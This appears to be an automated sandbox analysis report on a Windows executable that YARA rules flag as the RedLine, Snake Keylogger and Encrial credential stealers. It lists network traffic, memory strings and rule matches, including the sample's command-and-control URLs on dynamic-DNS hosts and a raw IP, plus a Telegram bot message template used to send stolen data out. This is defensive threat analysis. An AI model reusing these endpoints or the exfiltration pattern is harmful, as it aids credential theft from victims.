Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.besemglda.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 01:42:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002725000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002725000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.besemglda.com
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0-
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002768000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enl
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.000000000263E000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000026AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: YDg44STseR.exe, 00000000.00000002.2677264082.000000000263E000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002668000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002668000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/l
Source: YDg44STseR.exe, 00000000.00000002.2677264082.0000000002794000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49725 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: YDg44STseR.exe, type: SAMPLE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.YDg44STseR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.YDg44STseR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00408C60	0_2_00408C60
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0040DC11	0_2_0040DC11
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00407C3F	0_2_00407C3F
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00418CCC	0_2_00418CCC
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00406CA0	0_2_00406CA0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_004028B0	0_2_004028B0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0041A4BE	0_2_0041A4BE
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00418244	0_2_00418244
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00401650	0_2_00401650
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00402F20	0_2_00402F20
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_004193C4	0_2_004193C4
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00418788	0_2_00418788
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00402F89	0_2_00402F89
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00402B90	0_2_00402B90
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_004073A0	0_2_004073A0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214D252	0_2_0214D252
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214F168	0_2_0214F168
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_021474E0	0_2_021474E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214C4E0	0_2_0214C4E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214D528	0_2_0214D528
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214A598	0_2_0214A598
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214DAD8	0_2_0214DAD8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214D800	0_2_0214D800
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214586F	0_2_0214586F
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214C980	0_2_0214C980
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_02146EA8	0_2_02146EA8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_02142EF8	0_2_02142EF8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214CC58	0_2_0214CC58
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_02144311	0_2_02144311
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214F15A	0_2_0214F15A
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0214C6A8	0_2_0214C6A8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C2298	0_2_061C2298
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C52A8	0_2_061C52A8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C9EA8	0_2_061C9EA8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C0B30	0_2_061C0B30
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CCF30	0_2_061CCF30
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C1BB0	0_2_061C1BB0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C97D8	0_2_061C97D8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CE090	0_2_061CE090
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C2980	0_2_061C2980
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CF637	0_2_061CF637
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C8E20	0_2_061C8E20
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CF648	0_2_061CF648
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CFA92	0_2_061CFA92
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C228A	0_2_061C228A
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CFAA0	0_2_061CFAA0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C52A2	0_2_061C52A2
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C0B20	0_2_061C0B20
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CCF20	0_2_061CCF20
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CD379	0_2_061CD379
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C1B9F	0_2_061C1B9F
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CD388	0_2_061CD388
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CD7D0	0_2_061CD7D0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CD7E0	0_2_061CD7E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C0006	0_2_061C0006
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CDC38	0_2_061CDC38
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CDC28	0_2_061CDC28
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C0040	0_2_061C0040
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CE07F	0_2_061CE07F
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CE4DA	0_2_061CE4DA
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CE4E8	0_2_061CE4E8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CE930	0_2_061CE930
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CE940	0_2_061CE940
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061C297A	0_2_061C297A
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CED98	0_2_061CED98
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CED95	0_2_061CED95
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CF1F0	0_2_061CF1F0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_061CF1E0	0_2_061CF1E0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B9418	0_2_063B9418
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B8640	0_2_063B8640
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B7FE0	0_2_063B7FE0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B6038	0_2_063B6038
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B003D	0_2_063B003D
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B8631	0_2_063B8631
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BE631	0_2_063BE631
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B6027	0_2_063B6027
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BC618	0_2_063BC618
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B3008	0_2_063B3008
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BF408	0_2_063BF408
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BC608	0_2_063BC608
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B9407	0_2_063B9407
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B3005	0_2_063B3005
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BD878	0_2_063BD878
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B4A72	0_2_063B4A72
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B6E70	0_2_063B6E70
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BD868	0_2_063BD868
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B3460	0_2_063B3460
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B3452	0_2_063B3452
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063B1A50	0_2_063B1A50
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_063BB850	0_2_063BB850
